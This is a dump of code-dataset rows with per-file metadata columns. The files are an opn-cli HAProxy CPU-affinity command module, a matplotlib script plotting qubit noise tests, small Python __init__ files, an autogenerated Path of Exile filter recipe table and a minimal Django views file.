version, start, length, checksum = struct.unpack("!4I", rsp[0:16])
print version, start, length, checksum
print(json.loads(rsp[16:]))
| 32.163265
| 76
| 0.625
| 217
| 1,576
| 4.493088
| 0.262673
| 0.098462
| 0.147692
| 0.213333
| 0.749744
| 0.749744
| 0.749744
| 0.749744
| 0.749744
| 0.749744
| 0
| 0.071373
| 0.182107
| 1,576
| 48
| 77
| 32.833333
| 0.685027
| 0.02665
| 0
| 0
| 0
| 0
| 0.081749
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0.133333
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
c7f1ed3360455b177b887860b17f2df1967bf4ca
| 10,110
|
py
|
Python
|
opnsense_cli/commands/plugin/haproxy/cpu.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 13
|
2021-05-17T10:42:25.000Z
|
2022-02-21T02:10:41.000Z
|
opnsense_cli/commands/plugin/haproxy/cpu.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 14
|
2021-05-17T13:53:27.000Z
|
2021-12-16T12:45:44.000Z
|
opnsense_cli/commands/plugin/haproxy/cpu.py
|
jan-win1993/opn-cli
|
83c4792571dacbe6483722a95276954c7a2d0b3c
|
[
"BSD-2-Clause"
] | 2
|
2021-04-28T08:41:07.000Z
|
2022-03-28T10:20:51.000Z
|
import click
from opnsense_cli.formatters.cli_output import CliOutputFormatter
from opnsense_cli.callbacks.click import \
formatter_from_formatter_name, bool_as_string, available_formats, tuple_to_csv
from opnsense_cli.commands.plugin.haproxy import haproxy
from opnsense_cli.api.client import ApiClient
from opnsense_cli.api.plugin.haproxy import Settings, Service
from opnsense_cli.facades.commands.plugin.haproxy.cpu import HaproxyCpuFacade
# click decorators that inject the shared ApiClient / HaproxyCpuFacade
# instances (stored on the click context) into command callbacks.
pass_api_client = click.make_pass_decorator(ApiClient)
pass_haproxy_cpu_svc = click.make_pass_decorator(HaproxyCpuFacade)
@haproxy.group()
@pass_api_client
@click.pass_context
def cpu(ctx, api_client: ApiClient, **kwargs):
    """
    CPU affinity rules.
    """
    # Wire the facade (settings + service APIs) into the context so the
    # subcommands below can receive it via pass_haproxy_cpu_svc.
    ctx.obj = HaproxyCpuFacade(Settings(api_client), Service(api_client))
@cpu.command()
@click.option(
    '--output', '-o',
    help='Specifies the Output format.',
    default="table",
    type=click.Choice(available_formats()),
    callback=formatter_from_formatter_name,
    show_default=True,
)
@click.option(
    '--cols', '-c',
    # FIX: the previous single-quoted literal relied on implicit string
    # concatenation ('... (-c ' '' ') ...'), so the quoted empty string was
    # silently dropped from the rendered help text.
    help="Which columns should be printed? Pass empty string (-c '') to show all columns",
    default=(
        "uuid,enabled,name,process_id,thread_id,cpu_id"
    ),
    show_default=True,
)
@pass_haproxy_cpu_svc
def list(haproxy_cpu_svc: HaproxyCpuFacade, **kwargs):
    """
    Show all cpu
    """
    result = haproxy_cpu_svc.list_cpus()
    CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@cpu.command()
@click.argument('uuid')
@click.option(
    '--output', '-o',
    help='Specifies the Output format.',
    default="table",
    type=click.Choice(available_formats()),
    callback=formatter_from_formatter_name,
    show_default=True,
)
@click.option(
    '--cols', '-c',
    # FIX: double-quoted so the literal '' survives; the previous
    # single-quoted form used implicit concatenation and rendered as "(-c )".
    help="Which columns should be printed? Pass empty string (-c '') to show all columns",
    default=(
        "uuid,enabled,name,process_id,thread_id,cpu_id"
    ),
    show_default=True,
)
@pass_haproxy_cpu_svc
def show(haproxy_cpu_svc: HaproxyCpuFacade, **kwargs):
    """
    Show details for cpu
    """
    result = haproxy_cpu_svc.show_cpu(kwargs['uuid'])
    CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@cpu.command()
@click.argument('name')
@click.option(
    '--enabled/--no-enabled',
    help=('Enable this CPU affinity rule.'),
    show_default=True,
    is_flag=True,
    callback=bool_as_string,
    default=True,
    required=True,
)
@click.option(
    '--process_id',
    help=('Process ID that should bind to a specific CPU set. Any process IDs above nbproc are ignored.'),
    # 'all'/'odd'/'even' plus x1..x63; generated instead of a hand-typed list.
    type=click.Choice(['all', 'odd', 'even'] + ['x%d' % i for i in range(1, 64)]),
    multiple=False,
    callback=tuple_to_csv,
    show_default=True,
    default=None,
    required=True,
)
@click.option(
    '--thread_id',
    help=('Thread ID that should bind to a specific CPU set. Any thread IDs above nbthread are ignored.'),
    type=click.Choice(['all', 'odd', 'even'] + ['x%d' % i for i in range(1, 64)]),
    multiple=False,
    callback=tuple_to_csv,
    show_default=True,
    default=None,
    required=True,
)
@click.option(
    '--cpu_id',
    help=('Bind the process/thread ID to this CPU.'),
    # cpu_id additionally allows x0 (CPU numbering starts at 0).
    type=click.Choice(['all', 'odd', 'even'] + ['x%d' % i for i in range(0, 64)]),
    multiple=True,
    callback=tuple_to_csv,
    show_default=True,
    default=None,
    required=True,
)
@click.option(
    '--output', '-o',
    help='Specifies the Output format.',
    default="plain",
    type=click.Choice(available_formats()),
    callback=formatter_from_formatter_name,
    show_default=True,
)
@click.option(
    '--cols', '-c',
    # FIX: double-quoted so the literal '' is not lost to implicit string
    # concatenation (the old help rendered as "(-c )").
    help="Which columns should be printed? Pass empty string (-c '') to show all columns",
    default="result,validations",
    show_default=True,
)
@pass_haproxy_cpu_svc
def create(haproxy_cpu_svc: HaproxyCpuFacade, **kwargs):
    """
    Create a new cpu
    """
    json_payload = {
        'cpu': {
            "enabled": kwargs['enabled'],
            "name": kwargs['name'],
            "process_id": kwargs['process_id'],
            "thread_id": kwargs['thread_id'],
            "cpu_id": kwargs['cpu_id'],
        }
    }
    result = haproxy_cpu_svc.create_cpu(json_payload)
    CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@cpu.command()
@click.argument('uuid')
@click.option(
    '--enabled/--no-enabled',
    help=('Enable this CPU affinity rule.'),
    show_default=True,
    is_flag=True,
    callback=bool_as_string,
    default=None
)
@click.option(
    '--name',
    help=('Choose a name for this CPU affinity rule.'),
    show_default=True,
    default=None
)
@click.option(
    '--process_id',
    help=('Process ID that should bind to a specific CPU set. Any process IDs above nbproc are ignored.'),
    # 'all'/'odd'/'even' plus x1..x63 — built programmatically instead of a
    # 66-entry literal; the resulting list is identical.
    type=click.Choice(['all', 'odd', 'even'] + ['x%d' % i for i in range(1, 64)]),
    multiple=False,
    callback=tuple_to_csv,
    show_default=True,
    default=None
)
@click.option(
    '--thread_id',
    help=('Thread ID that should bind to a specific CPU set. Any thread IDs above nbthread are ignored.'),
    type=click.Choice(['all', 'odd', 'even'] + ['x%d' % i for i in range(1, 64)]),
    multiple=False,
    callback=tuple_to_csv,
    show_default=True,
    default=None
)
@click.option(
    '--cpu_id',
    help=('Bind the process/thread ID to this CPU.'),
    # cpu_id additionally allows x0 (CPU numbering starts at 0), hence range(0, 64).
    type=click.Choice(['all', 'odd', 'even'] + ['x%d' % i for i in range(0, 64)]),
    multiple=True,
    callback=tuple_to_csv,
    show_default=True,
    default=None
)
@click.option(
    '--output', '-o',
    help='Specifies the Output format.',
    default="plain",
    type=click.Choice(available_formats()),
    callback=formatter_from_formatter_name,
    show_default=True,
)
@click.option(
    '--cols', '-c',
    # Double-quoted so the literal '' survives: the original single-quoted form
    # underwent implicit string concatenation and rendered as "(-c )" in --help.
    help="Which columns should be printed? Pass empty string (-c '') to show all columns",
    default="result,validations",
    show_default=True,
)
@pass_haproxy_cpu_svc
def update(haproxy_cpu_svc: HaproxyCpuFacade, **kwargs):
    """
    Update a cpu affinity rule identified by UUID and print the API result.
    """
    json_payload = {
        'cpu': {}
    }
    # Only send fields the user explicitly provided; None means "leave unchanged".
    # (The original called option.lower(), a no-op since every name is lowercase.)
    for option in ['enabled', 'name', 'process_id', 'thread_id', 'cpu_id']:
        if kwargs[option] is not None:
            json_payload['cpu'][option] = kwargs[option]
    result = haproxy_cpu_svc.update_cpu(kwargs['uuid'], json_payload)
    CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
@cpu.command()
@click.argument('uuid')
@click.option(
    '--output', '-o',
    help='Specifies the Output format.',
    default="plain",
    type=click.Choice(available_formats()),
    callback=formatter_from_formatter_name,
    show_default=True,
)
@click.option(
    '--cols', '-c',
    # Double-quoted so the literal '' survives: the original single-quoted form
    # underwent implicit string concatenation and rendered as "(-c )" in --help.
    help="Which columns should be printed? Pass empty string (-c '') to show all columns",
    default="result,validations",
    show_default=True,
)
@pass_haproxy_cpu_svc
def delete(haproxy_cpu_svc: HaproxyCpuFacade, **kwargs):
    """
    Delete the cpu affinity rule identified by UUID and print the API result.
    """
    result = haproxy_cpu_svc.delete_cpu(kwargs['uuid'])
    CliOutputFormatter(result, kwargs['output'], kwargs['cols'].split(",")).echo()
| 33.366337
| 116
| 0.56815
| 1,262
| 10,110
| 4.4271
| 0.142631
| 0.039377
| 0.051011
| 0.027564
| 0.804009
| 0.773403
| 0.759442
| 0.751387
| 0.745481
| 0.745481
| 0
| 0.088687
| 0.214837
| 10,110
| 302
| 117
| 33.476821
| 0.615142
| 0.009397
| 0
| 0.712121
| 0
| 0
| 0.280331
| 0.013503
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022727
| false
| 0.05303
| 0.026515
| 0
| 0.049242
| 0.018939
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
400ee2ca7cf76b096ea6a662d8f0b8ce121f4276
| 40
|
py
|
Python
|
hywaves/statistical/plots/__init__.py
|
ripolln/hywaves
|
14fb9001e18db375c2852b83db6a5494ec92064b
|
[
"MIT"
] | null | null | null |
hywaves/statistical/plots/__init__.py
|
ripolln/hywaves
|
14fb9001e18db375c2852b83db6a5494ec92064b
|
[
"MIT"
] | null | null | null |
hywaves/statistical/plots/__init__.py
|
ripolln/hywaves
|
14fb9001e18db375c2852b83db6a5494ec92064b
|
[
"MIT"
] | null | null | null |
from . import config
from . import mda
| 10
| 20
| 0.725
| 6
| 40
| 4.833333
| 0.666667
| 0.689655
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.225
| 40
| 3
| 21
| 13.333333
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
406ea50651ff9a38d46136ee130c31a1ca4c1386
| 10,417
|
py
|
Python
|
Programs/Plots/noise_plots.py
|
qismib/TSINAME
|
98734555fe8bf99e72687e8697721db2770c8862
|
[
"MIT"
] | 1
|
2021-03-14T19:02:29.000Z
|
2021-03-14T19:02:29.000Z
|
Programs/Plots/noise_plots.py
|
qismib/TSINAME
|
98734555fe8bf99e72687e8697721db2770c8862
|
[
"MIT"
] | null | null | null |
Programs/Plots/noise_plots.py
|
qismib/TSINAME
|
98734555fe8bf99e72687e8697721db2770c8862
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt
from matplotlib.collections import EventCollection
import numpy as np
# Enlarge tick labels on every figure created below.
plt.rc('xtick', labelsize=16)
plt.rc('ytick', labelsize=16)
def autolabel(rects, axis=None):
    """
    Attach a text label above each bar displaying its height.

    Parameters
    ----------
    rects : iterable of bar Rectangles (as returned by ``Axes.bar``).
    axis :  Axes to draw on.  Defaults to the module-global ``ax`` so that
            existing ``autolabel(rectangle)`` calls keep their old behavior,
            but callers can now pass the axes explicitly instead of relying
            on global state.
    """
    target = ax if axis is None else axis
    for rect in rects:
        height = rect.get_height()
        # '%f' % height + " %" substitutes the height into the string and
        # appends a percent sign (height is formatted as a float via '%f').
        target.text(rect.get_x() + rect.get_width()/2., height + 3, '%f' % height + " %", ha='center', va='bottom')
# --------------------------------------------- Main program
"""
# Santiago, |0> test
qubit_number = [1,2,3,4,5]
noise = [1,0,5.05,1,2]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["b", "b", "b", "b", "b"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:blue')
plt.suptitle("Backend: ibmq_santiago", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n|0> test", fontsize=12)
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Santiago, |-> test
qubit_number = [1,2,3,4,5]
noise = [2,3,2.02,1,3]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["b", "b", "b", "b", "b"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:blue')
plt.suptitle("Backend: ibmq_santiago", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n| - > test", fontsize=12)
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Vigo, |0> test
qubit_number = [1,2,3,4,5]
noise = [3,3,2.02,1,6]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["g", "g", "g", "g", "g"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:green')
plt.suptitle("Backend: ibmq_vigo", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n|0> test", fontsize=12)
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Vigo, |-> test
qubit_number = [1,2,3,4,5]
noise = [12,3,4.04,5,5]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["g", "g", "g", "g", "g"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:green')
plt.suptitle("Backend: ibmq_vigo", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n| - > test", fontsize=12)
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Yorktown, |0> test
qubit_number = [1,2,3,4,5]
noise = [0,2,7.07,10,5]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["r", "r", "r", "r", "r"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:red')
plt.suptitle("Backend: ibmq_5_yorktown", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n|0> test", fontsize=12)
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Yorktown, |-> test
qubit_number = [1,2,3,4,5]
noise = [8,4,29.29,28,21]
fig, ax = plt.subplots(figsize=(8, 7))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
rectangle = ax.bar([1,2,3,4,5], height=[noise[0], noise[1], noise[2], noise[3], noise[4]], \
tick_label=["1", "2", "3", "4", "5"], color=["r", "r", "r", "r", "r"])
plt.axis([0.5, 5.5, 0, 110])
autolabel(rectangle)
ax.plot(qubit_number, noise, color='tab:red')
plt.suptitle("Backend: ibmq_5_yorktown", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel\n| - > test", fontsize=12)
"""
# ---------------------------------------------------------------------------------------------------------------------------------------------------
# Total: every backend and both test types on a single set of axes.
fig, ax = plt.subplots(figsize=(10, 6))
ax.set_ylabel("Probability (%)")
ax.set_xlabel("N (number of qubits in parallel)")
plt.suptitle("Noise tests", fontsize=15, fontweight="bold")
plt.title("Probability of having an error with N qubits in parallel", fontsize=12)
plt.axis([0.5, 5.5, -12, 45])
# Per-backend horizontal offsets ("sfasamento" = shift) so markers from
# different series do not overlap at the same integer N.
sfasamento1 = [0.1, 0.1, 0.1, 0.1, 0.1]
sfasamento2 = [0.06, 0.06, 0.06, 0.06, 0.06]
sfasamento3 = [0.03, 0.03, 0.03, 0.03, 0.03]
ax.axvspan(0.8, 1.2, alpha=0.2)  # Shade a band around each integer N
ax.axvspan(1.8, 2.2, alpha=0.2)
ax.axvspan(2.8, 3.2, alpha=0.2)
ax.axvspan(3.8, 4.2, alpha=0.2)
ax.axvspan(4.8, 5.2, alpha=0.2)
# Santiago, |0> test
x = [1,2,3,4,5]
y = [1,0,5.05,1,2]
yerr = np.sqrt(100)  # constant error bar of 10; presumably sqrt of shot count — TODO confirm
for k in range(5):
    x[k] = x[k] + sfasamento1[k]
ax.plot(x, y, color="b", label="ibmq_santiago: |0> test")
plt.errorbar(x, y, yerr=yerr, fmt="bo")
# Santiago, |-> test
x = [1,2,3,4,5]
y = [2,3,2.02,1,3]
yerr = np.sqrt(100)
for k in range(5):
    x[k] = x[k] - sfasamento1[k]
ax.plot(x, y, "b--", label="ibmq_santiago: |-> test")
plt.errorbar(x, y, yerr=yerr, fmt="bo")
# Vigo, |0> test
x = [1,2,3,4,5]
y = [3,3,2.02,1,6]
yerr = np.sqrt(100)
for k in range(5):
    x[k] = x[k] + sfasamento2[k]
ax.plot(x, y, color="g", label="ibmq_vigo: |0> test")
plt.errorbar(x, y, yerr=yerr, fmt="go")
# Vigo, |-> test
x = [1,2,3,4,5]
y = [12,3,4.04,5,5]
yerr = np.sqrt(100)
for k in range(5):
    x[k] = x[k] - sfasamento2[k]
ax.plot(x, y, "g--", label="ibmq_vigo: |-> test")
plt.errorbar(x, y, yerr=yerr, fmt="go")
# Yorktown, |0> test
x = [1,2,3,4,5]
y = [0,2,7.07,10,5]
yerr = np.sqrt(100)
for k in range(5):
    x[k] = x[k] + sfasamento3[k]
ax.plot(x, y, color="r", label="ibmq_5_yorktown: |0> test")
plt.errorbar(x, y, yerr=yerr, fmt="ro")
# Yorktown, |-> test
x = [1,2,3,4,5]
y = [8,4,29.29,28,21]
yerr = np.sqrt(100)
for k in range(5):
    x[k] = x[k] - sfasamento3[k]
ax.plot(x, y, "r--", label="ibmq_5_yorktown: |-> test")
plt.errorbar(x, y, yerr=yerr, fmt="ro")
# Zero-error reference line across the whole x range.
x0 = [0.5,5.5]
y0 = [0,0]
plt.plot(x0, y0, "c:", label="Ideal case (no noise)", linewidth=2)
plt.legend()
# -------------------------------------------------------------------------------------------
# Total, but separated by the two test types: one series per backend, |0> test only.
fig, ax = plt.subplots(figsize=(10, 6))
ax.set_ylabel("Probability (%)", fontsize=16)
ax.set_xlabel("N (number of qubits in parallel)", fontsize=16)
plt.title("Probability of having an error with N qubits in parallel\n|0> test", fontsize=16)
plt.axis([0.5, 5.5, -12, 45])
# Horizontal offsets ("sfasamento" = shift) so series do not overlap.
sfasamento1 = [-0.1, -0.1, -0.1, -0.1, -0.1]
sfasamento2 = [0, 0, 0, 0, 0]
sfasamento3 = [0.1, 0.1, 0.1, 0.1, 0.1]
ax.axvspan(0.8, 1.2, alpha=0.2)  # Shade a band around each integer N
ax.axvspan(1.8, 2.2, alpha=0.2)
ax.axvspan(2.8, 3.2, alpha=0.2)
ax.axvspan(3.8, 4.2, alpha=0.2)
ax.axvspan(4.8, 5.2, alpha=0.2)
# Santiago, |0> test
x = [1,2,3,4,5]
y = [1,0,5.05,1,2]
yerr = np.sqrt(100)  # constant error bar of 10; presumably sqrt of shot count — TODO confirm
for k in range(5):
    x[k] = x[k] + sfasamento1[k]
ax.plot(x, y, "b-.", label="ibmq_santiago")
plt.errorbar(x, y, yerr=yerr, fmt="bo")
# Vigo, |0> test
x = [1,2,3,4,5]
y = [3,3,2.02,1,6]
yerr = np.sqrt(100)
for k in range(5):
    x[k] = x[k] + sfasamento2[k]
ax.plot(x, y, "g-.", label="ibmq_vigo")
plt.errorbar(x, y, yerr=yerr, fmt="go")
# Yorktown, |0> test
x = [1,2,3,4,5]
y = [0,2,7.07,10,5]
yerr = np.sqrt(100)
for k in range(5):
    x[k] = x[k] + sfasamento3[k]
ax.plot(x, y, "r-.", label="ibmq_5_yorktown")
plt.errorbar(x, y, yerr=yerr, fmt="ro")
# Zero-error reference line across the whole x range.
x0 = [0.5,5.5]
y0 = [0,0]
plt.plot(x0, y0, "c:", label="Ideal case (no noise)", linewidth=2)
plt.legend()
# ------------------------------------
# Same per-backend comparison for the |-> test, then show all figures.
fig, ax = plt.subplots(figsize=(10, 6))
ax.set_ylabel("Probability (%)", fontsize=16)
ax.set_xlabel("N (number of qubits in parallel)", fontsize=16)
plt.title("Probability of having an error with N qubits in parallel\n|-> test", fontsize=16)
plt.axis([0.5, 5.5, -12, 45])
# Horizontal offsets ("sfasamento" = shift) so series do not overlap.
sfasamento1 = [-0.1, -0.1, -0.1, -0.1, -0.1]
sfasamento2 = [0, 0, 0, 0, 0]
sfasamento3 = [0.1, 0.1, 0.1, 0.1, 0.1]
ax.axvspan(0.8, 1.2, alpha=0.2)  # Shade a band around each integer N
ax.axvspan(1.8, 2.2, alpha=0.2)
ax.axvspan(2.8, 3.2, alpha=0.2)
ax.axvspan(3.8, 4.2, alpha=0.2)
ax.axvspan(4.8, 5.2, alpha=0.2)
# Santiago, |-> test
x = [1,2,3,4,5]
y = [2,3,2.02,1,3]
yerr = np.sqrt(100)  # constant error bar of 10; presumably sqrt of shot count — TODO confirm
for k in range(5):
    x[k] = x[k] + sfasamento1[k]
ax.plot(x, y, "b-.", label="ibmq_santiago")
plt.errorbar(x, y, yerr=yerr, fmt="bo")
# Vigo, |-> test
x = [1,2,3,4,5]
y = [12,3,4.04,5,5]
yerr = np.sqrt(100)
for k in range(5):
    x[k] = x[k] + sfasamento2[k]
ax.plot(x, y, "g-.", label="ibmq_vigo")
plt.errorbar(x, y, yerr=yerr, fmt="go")
# Yorktown, |-> test
x = [1,2,3,4,5]
y = [8,4,29.29,28,21]
yerr = np.sqrt(100)
for k in range(5):
    x[k] = x[k] + sfasamento3[k]
ax.plot(x, y, "r-.", label="ibmq_5_yorktown")
plt.errorbar(x, y, yerr=yerr, fmt="ro")
# Zero-error reference line across the whole x range.
x0 = [0.5,5.5]
y0 = [0,0]
plt.plot(x0, y0, "c:", label="Ideal case (no noise)", linewidth=2)
plt.legend()
plt.show()
| 25.912935
| 149
| 0.544783
| 1,807
| 10,417
| 3.1057
| 0.086884
| 0.01283
| 0.016037
| 0.021383
| 0.898076
| 0.89469
| 0.883999
| 0.883999
| 0.878831
| 0.846757
| 0
| 0.085363
| 0.140827
| 10,417
| 401
| 150
| 25.977556
| 0.541676
| 0.090045
| 0
| 0.808219
| 0
| 0
| 0.143677
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006849
| false
| 0
| 0.020548
| 0
| 0.027397
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
408d3d4b9d2f68bc4d98b1ed58a6878bf1665658
| 176
|
py
|
Python
|
multidomain_sentiment/__init__.py
|
koreyou/multidomain-sentiment
|
766afdb839483c38a141c8d1d60c6faa75bd2684
|
[
"CC0-1.0"
] | null | null | null |
multidomain_sentiment/__init__.py
|
koreyou/multidomain-sentiment
|
766afdb839483c38a141c8d1d60c6faa75bd2684
|
[
"CC0-1.0"
] | null | null | null |
multidomain_sentiment/__init__.py
|
koreyou/multidomain-sentiment
|
766afdb839483c38a141c8d1d60c6faa75bd2684
|
[
"CC0-1.0"
] | null | null | null |
from multidomain_sentiment import dataset
from multidomain_sentiment import word_embedding
from multidomain_sentiment import models
from multidomain_sentiment import training
| 29.333333
| 48
| 0.903409
| 21
| 176
| 7.333333
| 0.428571
| 0.38961
| 0.623377
| 0.779221
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.096591
| 176
| 5
| 49
| 35.2
| 0.968553
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
40ee90f189b88eabf871ba64016a2b522ac67f93
| 1,570
|
py
|
Python
|
autogen/custom_ex_shard_recipe.py
|
xanthics/poe_filter
|
d01bc823f97e247ebdf2921b86b720e2b6edc673
|
[
"MIT"
] | 4
|
2016-05-03T17:49:13.000Z
|
2019-03-30T03:22:40.000Z
|
autogen/custom_ex_shard_recipe.py
|
xanthics/poe_filter
|
d01bc823f97e247ebdf2921b86b720e2b6edc673
|
[
"MIT"
] | 2
|
2016-05-03T09:07:52.000Z
|
2018-12-24T08:47:12.000Z
|
autogen/custom_ex_shard_recipe.py
|
xanthics/poe_filter
|
d01bc823f97e247ebdf2921b86b720e2b6edc673
|
[
"MIT"
] | 1
|
2018-11-21T15:54:08.000Z
|
2018-11-21T15:54:08.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Created: 02/07/2022(m/d/y) 16:44:11 UTC from "Archnemesis" data
desc = "Ex Shard Autogen"
# Base type : settings pair.  Every base shares identical filter settings, so
# the table is generated from the list of base names rather than spelled out
# entry by entry; each entry still gets its own fresh 'other' list.
_BASES = [
    'Amulet', 'Belt', 'Body Armour', 'Boots', 'Gloves', 'Helmet', 'Ring',
    'Two Hand" "Staves" "Bow',
]
items = {
    '0 ' + base: {
        'class': base,
        'other': ['HasInfluence Crusader Elder Hunter Redeemer Shaper Warlord', 'Rarity Rare', 'Identified False'],
        'type': 'recipe item rare',
    }
    for base in _BASES
}
| 87.222222
| 203
| 0.683439
| 197
| 1,570
| 5.446701
| 0.28934
| 0.126747
| 0.186393
| 0.223672
| 0.752097
| 0.752097
| 0.752097
| 0.752097
| 0.752097
| 0.752097
| 0
| 0.016875
| 0.131847
| 1,570
| 17
| 204
| 92.352941
| 0.77036
| 0.081529
| 0
| 0
| 1
| 0
| 0.752434
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
909fa8f9976516d4e3ffe7ad64792305b3bdde14
| 164
|
py
|
Python
|
jsi/views.py
|
lqez/just-sort-it
|
779709254a38afc029bd1e8410ee30b3f0665715
|
[
"MIT"
] | null | null | null |
jsi/views.py
|
lqez/just-sort-it
|
779709254a38afc029bd1e8410ee30b3f0665715
|
[
"MIT"
] | null | null | null |
jsi/views.py
|
lqez/just-sort-it
|
779709254a38afc029bd1e8410ee30b3f0665715
|
[
"MIT"
] | null | null | null |
from django.http import HttpResponse
def welcome(request):
    """Serve the plain-text landing page."""
    body = 'welcome page'
    return HttpResponse(body)
def webhook(request):
    """Serve the webhook endpoint's placeholder response."""
    body = 'webhook page'
    return HttpResponse(body)
| 18.222222
| 39
| 0.756098
| 19
| 164
| 6.526316
| 0.578947
| 0.209677
| 0.403226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152439
| 164
| 8
| 40
| 20.5
| 0.892086
| 0
| 0
| 0
| 0
| 0
| 0.146341
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
